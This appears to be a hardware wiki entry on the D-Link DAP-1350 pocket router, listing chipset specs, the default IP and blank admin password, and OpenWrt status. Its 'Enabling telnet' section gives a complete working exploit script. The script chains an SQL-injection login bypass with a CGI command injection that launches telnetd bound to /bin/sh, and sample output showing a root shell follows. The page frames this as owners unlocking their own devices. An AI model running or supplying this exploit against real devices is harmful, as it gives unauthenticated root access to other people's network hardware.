D-Link DAP-1350 rev A1
D-Link DAP-1350 A1
Availability: now
Manuf (OEM/ODM): Cameo
FCC approval date: 15 September 2009
Country of manuf.: China
Type: wireless router, access point
FCC ID: KA2AP1350A1
IC ID: 4216A-AP1350
Power: 5 VDC, 2.5 A
Connector type: barrel
CPU1: Ralink RT3052 (384 MHz)
FLA1: 8 MiB8,388,608 B <br />65,536 Kib <br />8,192 KiB <br />64 Mib <br />0.00781 GiB <br /> (Macronix MX29LV640EBTI-70G)
RAM1: 32 MiB33,554,432 B <br />262,144 Kib <br />32,768 KiB <br />256 Mib <br />0.0313 GiB <br /> (ESMT M12L128168A-7T × 2)
Expansion IFs: USB 2.0
USB ports: 1
WI1 chip1: Ralink RT3052
WI1 802dot11 protocols: bgn
WI1 MIMO config: 2x2:2
WI1 antenna connector: none
ETH chip1: Ralink RT3052
LAN speed: 100M
LAN ports: 1
bgn
Stock FW OS: Linux
Default SSID: dlink (38 addl. devices)
Default IP address: 192.168.0.50
the IP 192.168.0.50 is used by 63 additional devices
of which 63 are D-Link devices
Default login user: admin
Default login password: blank
admin:blank credentials used by 344 additional devices
of which 180 are D-Link devices
CPU1 brand | WI1 chip1 brand | WI1 chip2 brand | |
---|---|---|---|
D-Link DAP-1350 rev A1 | Ralink | Ralink | |
D-Link DAP-1350 rev B1 | Ralink | Ralink |
For a list of all currently documented Ralink chipsets with specifications, see Ralink.
Wireless N Pocket Router & Access Point
Forum threads
- OpenWRT trunk contains support for the DAP-1350, however, the 12.09-beta is broken.
- You can build your own firmware now or wait for the Attitude Adjustment release.
Enabling telnet
A vulnerability was discovered in the stock firmware which allows arbitrary commands to be executed as root using HTTP POST requests to a CGI program.
A secondary SQL injection vulnerability also exists allowing one to bypass HTTP authentication.
• telnet |
---|
#!/bin/ksh # DAP-1350 telnetd, by brynet. # This effect all stock firmware images for the device. # Tested on OpenBSD. host=$1 if [ $# -ne 1 ]; then echo "usage: $0 host or ip" exit 1; fi base_req="POST /my_cgi.cgi?0.2592357019893825 HTTP/1.1\r\n"\ "Host: ${host}\r\nConnection: keep-alive\r\n"\ "Content-Type: application/x-www-form-urlencoded\r\n" # user_name=admin # user_pwd=';select 1;-- login_cmd="request=login&user_name=YWRtaW4&user_pwd=JztzZWxlY3QgMTstLQ" login_clen="Content-Length: $(echo -n ${login_cmd} | wc -c)\r\n\r\n" login_req="${base_req}${login_clen}${login_cmd}" echo $login_req | nc $host 80 | grep default > /dev/null 2>&1 if [ $? -eq 0 ]; then echo "Authenticated." else echo "Failed." exit 1; fi telnetd_cmd="request=admin_webtelnet&cmd=/usr/sbin/telnetd%20-l/bin/sh" telnetd_clen="Content-Length: $(echo -n ${telnetd_cmd} | wc -c)\r\n\r\n" telnetd_req="${base_req}${telnetd_clen}${telnetd_cmd}" echo $telnetd_req | nc $host 80 > /dev/null 2>&1 sleep 2; nc -z $host 23 > /dev/null 2>&1 if [ $? -eq 0 ]; then echo "Root shell, okey doke." telnet $host else echo "No root.. sorry, heh." exit 1; fi Note: nc(1) may be installed as netcat(1) on some systems. Modify as necessary. $ ./exploit.sh dlinkap # 192.168.0.50 Authenticated. Root shell, okey doke. Trying 192.168.0.50... Connected to dlinkap. Escape character is '^]'. ... motd/etc. # The factory set root password is unknown, so no login(1) process is started. You must run the exploit script each time the device is powered on. |